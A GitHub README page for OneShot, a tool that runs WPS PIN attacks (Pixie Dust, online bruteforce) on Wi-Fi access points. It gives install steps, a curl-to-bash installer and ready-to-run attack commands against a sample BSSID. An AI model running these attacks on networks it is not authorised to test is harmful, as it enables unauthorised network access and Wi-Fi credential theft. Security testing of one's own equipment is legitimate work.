Skip to content

Run WPS PIN attacks (Pixie Dust, online bruteforce, PIN prediction) without monitor mode with the wpa_supplicant

Notifications You must be signed in to change notification settings

VictorH028/OneShot

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Overview

OneShot performs Pixie Dust attack without having to switch to monitor mode.

Features

Requirements

Setup

Debian/Ubuntu

Installing requirements

sudo apt install -y python3 wpasupplicant iw wget

Installing Pixiewps

Ubuntu 18.04 and above or Debian 10 and above

sudo apt install -y pixiewps

Other versions

sudo apt install -y build-essential unzip
wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make
sudo make install

Getting OneShot

cd ~
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: getting a list of vulnerable to pixie dust devices for highlighting in scan results:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Arch Linux

Installing requirements

sudo pacman -S wpa_supplicant pixiewps wget python

Getting OneShot

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: getting a list of vulnerable to pixie dust devices for highlighting in scan results:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Alpine Linux

It can also be used to run on Android devices using Linux Deploy

Installing requirements
Adding the testing repository:

sudo sh -c 'echo "http://dl-cdn.alpinelinux.org/alpine/edge/testing/" >> /etc/apk/repositories'
sudo apk add python3 wpa_supplicant pixiewps iw

Getting OneShot

sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: getting a list of vulnerable to pixie dust devices for highlighting in scan results:

sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Please note that root access is required.

Using installer

curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash

Manually

Installing requirements

pkg install -y root-repo
pkg install -y git tsu python wpa-supplicant pixiewps iw openssl

Getting OneShot

git clone --depth 1 https://github.com/drygdryg/OneShot OneShot

Running

sudo python OneShot/oneshot.py -i wlan0 --iface-down -K

Usage

 oneshot.py <arguments>
 Required arguments:
     -i, --interface=<wlan0>  : Name of the interface to use

 Optional arguments:
     -b, --bssid=<mac>        : BSSID of the target AP
     -p, --pin=<wps pin>      : Use the specified pin (arbitrary string or 4/8 digit pin)
     -K, --pixie-dust         : Run Pixie Dust attack
     -B, --bruteforce         : Run online bruteforce attack
     --push-button-connect    : Run WPS push button connection

 Advanced arguments:
     -d, --delay=<n>          : Set the delay between pin attempts [0]
     -w, --write              : Write AP credentials to the file on success
     -F, --pixie-force        : Run Pixiewps with --force option (bruteforce full range)
     -X, --show-pixie-cmd     : Alway print Pixiewps command
     --vuln-list=<filename>   : Use custom file with vulnerable devices list ['vulnwsc.txt']
     --iface-down             : Down network interface when the work is finished
     -l, --loop               : Run in a loop
     -r, --reverse-scan       : Reverse order of networks in the list of networks. Useful on small displays
     --mtk-wifi               : Activate MediaTek Wi-Fi interface driver on startup and deactivate it on exit
                                (for internal Wi-Fi adapters implemented in MediaTek SoCs). Turn off Wi-Fi in the system settings before using this.
     -v, --verbose            : Verbose output

Usage examples

Start Pixie Dust attack on a specified BSSID:

sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K

Show avaliable networks and start Pixie Dust attack on a specified network:

sudo python3 oneshot.py -i wlan0 -K

Launch online WPS bruteforce with the specified first half of the PIN:

sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

Start WPS push button connection:s

sudo python3 oneshot.py -i wlan0 --pbc

Troubleshooting

"RTNETLINK answers: Operation not possible due to RF-kill"

Just run: sudo rfkill unblock wifi

"Device or resource busy (-16)"

Try disabling Wi-Fi in the system settings and kill the Network manager. Alternatively, you can try running OneShot with --iface-down argument.

The wlan0 interface disappears when Wi-Fi is disabled on Android devices with MediaTek SoC

Try running OneShot with the --mtk-wifi flag to initialize Wi-Fi device driver.

Acknowledgements

Special Thanks

  • rofl0r for initial implementation;
  • Monohrom for testing, help in catching bugs, some ideas;
  • Wiire for developing Pixiewps.

About

Run WPS PIN attacks (Pixie Dust, online bruteforce, PIN prediction) without monitor mode with the wpa_supplicant

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%